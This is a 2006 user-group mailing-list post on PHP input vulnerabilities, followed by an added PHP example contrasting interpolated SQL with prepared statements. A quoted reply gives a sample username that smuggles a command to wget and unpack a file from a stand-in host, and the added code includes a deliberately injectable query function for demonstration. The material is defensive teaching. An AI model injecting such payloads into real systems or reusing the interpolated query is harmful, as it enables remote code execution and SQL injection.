[CS-FSLUG] PHP vulnerabilities?
Frank Bax
fbax at sympatico.ca
Sat Jun 3 07:55:26 CDT 2006
At 09:42 AM 6/2/06, Tim Young wrote:
>There are quite a number of ways to do this sort of thing. Most of the
>time it is a poorly written PHP (or other language) script. The basic
>thing is when you give someone the ability to input something. For
>example, a username.
>
>Instead of having a username "Tim", they use something like:
> "Tim; \"exec('wget http://badsite.com/badfile.tgz; tar -xzf
>badfile.tgz')\""
>
>If whoever wrote the php program did not properly escape the variables
>on the way in, there is a decent chance that the variable will be used
>in some context where it will be executed.
What kind of PHP code would cause the above user input to be executed? A
"decent chance" implies the problem only surfaces with some coding practices.
At 04:52 PM 6/2/06, Chris Brault wrote:
>A name should only contain alpha characters while an address only
>integers and alpha characters.
And ' in name/street like O'Reilly.
And - for hyphenated name/street.
And ...
Continue with these exceptions and someday you could accidentally add a
character to "trusted" code that might actually reintroduce the problem you
were trying to avoid?
Whereas I'm not sure how the example provided by Tim would actually get
executed, I do know that the risk is real with input for databases. You
can avoid this problem by using prepare/execute code instead of the older query()
syntax. Example here:
http://www.ip97.com/pear/package.database.db.intro-execute.html
Notice the line that says:
? - (recommended) stands for a scalar value like strings or numbers. The
value will be automatically escaped and quoted according to the current
DBMS's requirements.
Frank
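An added example (not part of the thread, and not PEAR DB's own code) showing why the `?` placeholder handles names like O'Reilly without a hand-maintained list of "allowed" characters. It assumes PHP with the PDO SQLite driver and uses PDO's prepare/execute, which follows the same `?` placeholder convention as the PEAR DB page linked above; the table and names are constructed for the demonstration.

```php
<?php
// Constructed sample: an in-memory SQLite database with a few names.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT NOT NULL)');

// Insert names containing an apostrophe and a hyphen via a prepared
// statement; the driver quotes and escapes each value for us.
$insert = $db->prepare('INSERT INTO users (name) VALUES (?)');
foreach (["Tim", "O'Reilly", "Smith-Jones"] as $name) {
    $insert->execute([$name]);
}

// The older style: the SQL text is built by string interpolation, so any
// quote character in $name becomes part of the SQL syntax.
function lookupInterpolated(PDO $db, string $name): array
{
    $sql = "SELECT name FROM users WHERE name = '$name'";
    return $db->query($sql)->fetchAll(PDO::FETCH_COLUMN);
}

// The recommended style: a ? placeholder, with the value supplied at
// execute time and never parsed as SQL.
function lookupPrepared(PDO $db, string $name): array
{
    $stmt = $db->prepare('SELECT name FROM users WHERE name = ?');
    $stmt->execute([$name]);
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

foreach (["O'Reilly", "Smith-Jones"] as $name) {
    try {
        printf("interpolated %-12s -> %s\n", $name,
            json_encode(lookupInterpolated($db, $name)));
    } catch (PDOException $e) {
        // O'Reilly reaches this branch: the apostrophe ends the quoted
        // literal early and the statement no longer parses.
        printf("interpolated %-12s -> SQL error: %s\n", $name, $e->getMessage());
    }
    printf("prepared     %-12s -> %s\n", $name,
        json_encode(lookupPrepared($db, $name)));
}
```

The prepared lookup returns O'Reilly and Smith-Jones unchanged, while the interpolated lookup fails on the apostrophe; that failure is the same mechanism that lets crafted input alter a query when strings are built by hand.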